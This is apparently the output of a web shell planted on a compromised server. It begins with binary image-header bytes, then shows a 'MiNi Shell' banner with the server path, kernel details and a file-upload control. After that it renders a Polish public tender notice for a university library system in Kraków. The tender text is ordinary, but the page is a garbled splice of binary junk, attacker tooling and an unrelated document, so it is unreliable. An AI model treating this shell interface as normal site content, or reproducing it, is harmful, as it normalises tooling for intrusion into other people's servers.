JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240426/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240426/0030468801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa, instalacja i wdrożenie gotowego Systemu Bibliotecznego oraz Systemu Dostępu do Źródeł Cyfrowych wraz z usługą serwisową i gwarancyjną dla Uniwersytetu Komisji Edukacji Narodowej w Krakowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Uniwersytet Komisji Edukacji Narodowej w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001376</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Podchorążych 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-084</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ewa.lason@uken.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://platformazakupowa.pl/pn/up_krakow</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa, instalacja i wdrożenie gotowego Systemu Bibliotecznego oraz Systemu Dostępu do Źródeł Cyfrowych wraz z usługą serwisową i gwarancyjną dla Uniwersytetu Komisji Edukacji Narodowej w Krakowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f58d5673-03b1-11ef-b21f-3ab44b58c1d6</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00304688</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/up_krakow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/up_krakow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne zostały opisane w rozdziale XII SWZ, dostępnej na stronie prowadzonego postępowania</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje dotyczące RODO znajdują się w rozdziale XXIII SWZ, dostępnej na stronie prowadzonego postępowania</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje dotyczące RODO znajdują się w rozdziale XXIII SWZ, dostępnej na stronie prowadzonego postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">13/TP/BG/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest Dostawa, instalacja i wdrożenie gotowego Systemu Bibliotecznego oraz Systemu Dostępu do Źródeł Cyfrowych wraz z usługą serwisową i gwarancyjną dla Uniwersytetu Komisji Edukacji Narodowej w Krakowie, w tym w szczególności:<br/>a.	dostarczenie licencji Systemu Bibliotecznego z otwartym kodem źródłowym opartym o licencje opensource GPL, <br/>b.	dostarczenie licencji do Systemu Dostępu do Źródeł Cyfrowych,<br/>c.	analiza przedwdrożeniowa, instalacja i uruchomienie w/w Systemów, <br/>d.	wdrożenie Systemu Bibliotecznego wraz migracją danych oraz szkolenia, <br/>e.	napisanie dedykowanego oprogramowania niezbędnego do połączenia i prawidłowego działania systemów (istniejących u Zamawiającego i nowych, wdrażanych rozwiązań, wskazanych w lit. a, b i d powyżej) i przekazanie do niego praw na zasadach opisanych w załączniku 2 do SWZ (wzór umowy), o ile zaistnieje taka potrzeba,<br/>f.	usługa serwisowa na okres min.12 miesięcy.<br/>2.	Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku A do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48160000-7 - Pakiety oprogramowania bibliotecznego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówienia na podstawie art. 214 ust. 1 pkt 7 i 8 ustawy PZP do wartości 30 % zamówienia podstawowego, w zakresie możliwości zamówienia dodatkowych funkcjonalności systemu i serwisu.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas usunięcia błędu krytycznego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dodatkowe godziny rozwojowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dodatkowy serwis i gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> dotyczy Wykonawcy<br/>Zamawiający uzna warunek dotyczący zdolności technicznej lub zawodowej za spełniony, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich 3 lat, a jeśli okres prowadzenia działalności jest krótszy w tym okresie:<br/>a.	co najmniej dwie usługi (odrębne kontrakty) o wartości minimum 700 tyś. zł brutto łącznie, polegające na dostawie i wdrożeniu oferowanego Systemu Bibliotecznego, opartego o licencje OpenSource, zrealizowane na rzecz Uczelni Wyższej, posiadającej co najmniej 10 tyś. Studentów; <br/>b.	co najmniej dwie usługi (odrębne kontrakty) polegające na dostawie oferowanego Systemu Dostępu do Źródeł Cyfrowych, zrealizowane na rzecz Uczelni Wyższej;<br/>c.	co najmniej dwie usługi (odrębne kontrakty) polegające na dostawie i wdrożeniu oferowanego Systemu Bibliotecznego na rzecz Uczelni Wyższej, posiadającej co najmniej 10 tyś. Studentów, w zakresie których została wykonana integracja pomiędzy oferowanym systemem bibliotecznym, a działającym na tej Uczelni systemem dziekanatowym USOS w zakresie umożliwiającym wymianę danych o statusie studenta i zaległościach. <br/>Zamawiający „odrębny kontrakt” rozumie jako jedną, pisemną umowę odpłatną, a nie sumę pojedynczych ustnych bądź pisemnych zleceń realizowanych na rzecz tego samego podmiotu.<br/>UWAGA: W przypadku wykazywania zadania wykonywanego (trwającego), ocenie będzie podlegać wyłącznie część usługi faktycznie zrealizowana, przy czym stopień zaawansowania musi być na dzień składania oferty zrealizowana na poziomie co najmniej 60 % wartości całości zamówienia.<br/>Kontrakty wskazane na potwierdzenie wymagań w lit. a. do c. powyżej mogą być tożsame, o ile spełniają łącznie wszystkie stawiane wymagania. <br/>dotyczy kluczowego personelu:<br/>Wykonawca musi wskazać, iż będzie dysponować osobami, które będą uczestniczyć w wykonywaniu zamówienia, legitymujące się kwalifikacjami zawodowymi i doświadczeniem odpowiednimi do funkcji, jakie zostaną im powierzone: <br/>a. kierownika projektu, która łącznie spełnia poniższe wymagania:<br/>- wykształcenie wyższe,<br/>- co najmniej 5 lat doświadczenia w doradztwie informatycznym,<br/>- kwalifikacje w zarządzaniu projektami metodyką PRINCE2 potwierdzone certyfikatem PRINCE2 Practitioner lub równoważny. Za certyfikat równoważny Zamawiający uzna np.: certyfikaty przyznawane przez Project Management Institute (PMI), co najmniej na poziomie Project Management Professional (PMP) lub certyfikaty nadawane przez International Project Management Association (IPMA), co najmniej na poziomie C,<br/>- kwalifikacje we wdrażaniu systemów informatycznych potwierdzone certyfikatem Agile Service Projects. Za certyfikat równoważny Zamawiający uzna np. Scrum Master Certified, Scrum Developer Certified, Scrum Product Owner Certified,<br/>- kwalifikacje w zakresie zarządzania ryzykiem potwierdzone certyfikatem M_o_R Foundation Certificate in Risk Management. Za certyfikat równoważny Zamawiający uzna np Certified ISO 31000 Risk Manager,<br/>- kwalifikacje w zakresie usług dotyczących systemów informatycznych potwierdzone certyfikatem ITIL Expert Certificate in IT Service Management lub równoważny. Za certyfikat równoważny Zamawiający uzna np.: certyfikaty Sig Sigma Black Belt lub certyfikaty nadawane przez International Project Management Association (IPMA), co najmniej na poziomie B,<br/>- udział jako kierownik projektu w co najmniej dwóch (2) zakończonych odbiorem projektach informatycznych, polegających na dostawie i wdrożeniu oferowanego Systemu Bibliotecznego opartego o licencje OpenSource, w tym co najmniej jeden projekt zrealizowany na rzecz uczelni wyższej, posiadających co najmniej 10 tys. Studentów; <br/>b. architekta systemu, która łącznie spełnia poniższe wymagania:<br/>- wykształcenie wyższe,<br/>- co najmniej pięć lat doświadczenia zawodowego w realizacji projektów informatycznych,<br/>- znajomość zasad architektury korporacyjnej potwierdzonych certyfikatem TOGAF 9 lub równoważnym (równoważność rozumiana jako certyfikat wystawiany przez zewnętrzną organizację wymagający cyklicznego odnawiania i zdania egzaminu potwierdzającego wykazania się wiedzą z obszaru Architektury Korporacyjnej obejmujący minimum tworzenie wizji Architektury Korporacyjnej, Architekturę Biznesową, Architekturę Systemów Informacyjnych, Architekturę Technologiczną, Analizę rozwiązań, Planowanie Migracji Architektury, Zarządzanie wdrożeniem zmiany Architektury, Zarządzanie zmianą Architektury Korporacyjnej, Zarządzanie wymaganiami),<br/>- kwalifikacje w zakresie usług dotyczących systemów informatycznych potwierdzone certyfikatem ITIL Fondation Certificate in IT Service Management lub równoważny. Za certyfikat równoważny Zamawiający uzna np.: certyfikaty Sig Sigma Black Belt lub certyfikaty nadawane przez International Project Management Association (IPMA), co najmniej na poziomie C,<br/>- udział jako architekt systemu w co najmniej dwóch (2) zakończonych odbiorem projektach informatycznych, polegających na dostawie i wdrożeniu oferowanego Systemu Bibliotecznego opartego o licencje OpenSource, w tym co najmniej jeden projekt zrealizowany na rzecz Uczelni Wyższej, posiadającego co najmniej 10 tys. Studentów. <br/>c. specjalisty ds. wdrożeń, która spełnia łącznie poniższe wymagania:<br/>- wykształcenie wyższe,<br/>- co najmniej pięć lat doświadczenia zawodowego w realizacji projektów informatycznych,<br/>- kwalifikacje w zakresie wytwarzania oprogramowania potwierdzone ważnym certyfikatem Certified SCRUM Master lub Certified SCRUM Product Owner lub równoważny, (równoważność rozumiana jako certyfikat wystawiany przez niezależną organizację potwierdzający znajomość metodyki SCRUM na poziomie pozwalającym na pełnienie funkcji członka zespołu SCRUM),<br/>- kwalifikacje w zakresie usług dotyczących systemów informatycznych potwierdzone certyfikatem ITIL Expert Certificate in IT Service Management lub równoważny. Za certyfikat równoważny Zamawiający uzna np.: certyfikaty Sig Sigma Black Belt lub certyfikaty nadawane przez International Project Management Association (IPMA), co najmniej na poziomie B,<br/>- udział jako specjalista ds. wdrożeń w co najmniej dwóch (2) zakończonych odbiorem projektach informatycznym polegających na dostawie i wdrożeniu oferowanego Systemu Bibliotecznego opartego o licencje OpenSource, w tym co najmniej jeden projekt zrealizowany na rzecz uczelni wyższej, <br/>d. programisty, która spełnia łącznie poniższe wymagania:<br/>- wykształcenie wyższe,<br/>- doświadczenie w zakresie budowy oprogramowania webowego w połączeniu z systemami bazodanowymi, potwierdzoną certyfikatem lub dyplomem ukończenia kursu obejmującego ten zakres lub udziałem w co najmniej jednym zrealizowanym projekcie obejmującym ten zakres wraz z podaniem przedmiotu, daty wykonania, charakteru udziału i podmiotu, na rzecz którego projekt został wykonany,<br/>- doświadczenie w realizacji projektów informatycznych metodologią zwinną potwierdzone certyfikatem lub dyplomem ukończenia kursu obejmującego ten zakres lub udziałem w co najmniej jednym zrealizowanym projekcie realizowanym zgodnie z tą metodologią wraz z podaniem przedmiotu, daty wykonania, charakteru udziału i podmiotu, na rzecz którego projekt został wykonany,<br/>- udział jako programista w co najmniej jednym (1) zakończonym odbiorem projekcie informatycznym polegającym na dostawie i wdrożeniu oferowanego Systemu Bibliotecznego opartego o licencje OpenSource, zrealizowanego na rzecz uczelni wyższej,<br/>e. konsultanta, która spełnia łącznie poniższe wymagania:<br/>- wykształcenie wyższe,<br/>- udział jako konsultant w co najmniej jednym (1) zakończonym odbiorem projekcie informatycznym, polegającym na dostawie i wdrożeniu oferowanego Systemu Bibliotecznego opartego o licencje OpenSource,.<br/>f. Dwie osoby - testerzy, z których każda spełnia wszystkie poniższe wymagania:<br/>- wykształcenie wyższe,<br/>- wiedzę w zakresie testowania systemów popartą certyfikatem ISTQB Foundation lub wyższym lub certyfikatem równoważnym w zakresie testowania oprogramowania,<br/>- doświadczenie jako tester w co najmniej jednym (1) zakończonym odbiorem projekcie informatycznym, polegającym na dostawie i wdrożeniu oferowanego Systemu Bibliotecznego opartego o licencje OpenSource. <br/>Zamawiający nie dopuszcza łączenia uprawnień i doświadczenia wskazanych w lit. a do f przez jedną osobę<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców warunki określone w pkt 2.4.1. musi spełniać co najmniej jeden z Wykonawców samodzielnie, natomiast warunki wskazane w pkt. 2.4.2 mogą spełniać Wykonawcy łącznie, <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zmawiającego, o których mowa w art. 108 ust. 1 oraz 109 ust. 1<br/>2.	odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu Wykonawca składa:<br/>1.	wykaz usług wykonanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz <br/>2.	załączeniem dowodów określających czy te usługi zostały wykonane należycie. Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; <br/>Okres 3 lat , o którym mowa powyżej liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/>3.	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Zamawiający, na potwierdzenie zgodności oferowanych dostaw z wymaganiami określonymi w opisie przedmiotu zamówienia żąda złożenia wraz z ofertą następujących środków dowodowych: <br/>a.	Próbki oferowanego przez Wykonawcę Systemu Bibliotecznego zgodnej z wymaganiami dla próbki, jak też zgodnej ze sposobem i zakresem prezentacji.<br/>Zamawiający wymaga, aby próbka była złożona w podwójnej kopercie, jedna, wewnętrzna koperta powinna zawierać nazwę wykonawcy i nr postępowania, zewnętrzna koperta powinna zawierać wyłącznie oznakowanie „Próbka - dyski przenośne do postępowania 13/TP/BG/2024 – nie otwierać przed 10:30, dnia 8 maja 2024&#34; – bez oznaczenia Wykonawcy.<br/>Próbka musi zostać złożona wraz z ofertą przez wszystkich Wykonawców i dostarczona do siedziby zamawiającego na poniższy adres:<br/>Kraków, ul. Podchorążych, pokój nr 179 przed terminem otwarcia ofert, tj. do dnia 8 maja 2024 r. przed godziną 10:00<br/>Wymagania dotyczące sposobu i zakresu prezentacji złożonej wraz z ofertą próbki, zostały zawarte w załączniku A.1 do SWZ.<br/>Jednocześnie Zamawiający informuje, że prezentacja programu przez Wykonawcę (na podstawie dostarczonej próbki) odbędzie się w kolejnych 2 dniach roboczych licząc od dnia poinformowania Wykonawcy o dacie prezentacji. <br/>2. W przypadku zaoferowania przez Wykonawcę rozwiązań równoważnych, o których mowa pkt. 7-9 rozdziału III SWZ wykonawca zobowiązany jest do złożenia przedmiotowych środków dowodowych potwierdzających, że zaoferowane rozwiązania równoważne spełniają wymagania Zamawiającego wskazanego w załączniku A do SWZ <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2.	W przypadku Wykonawców 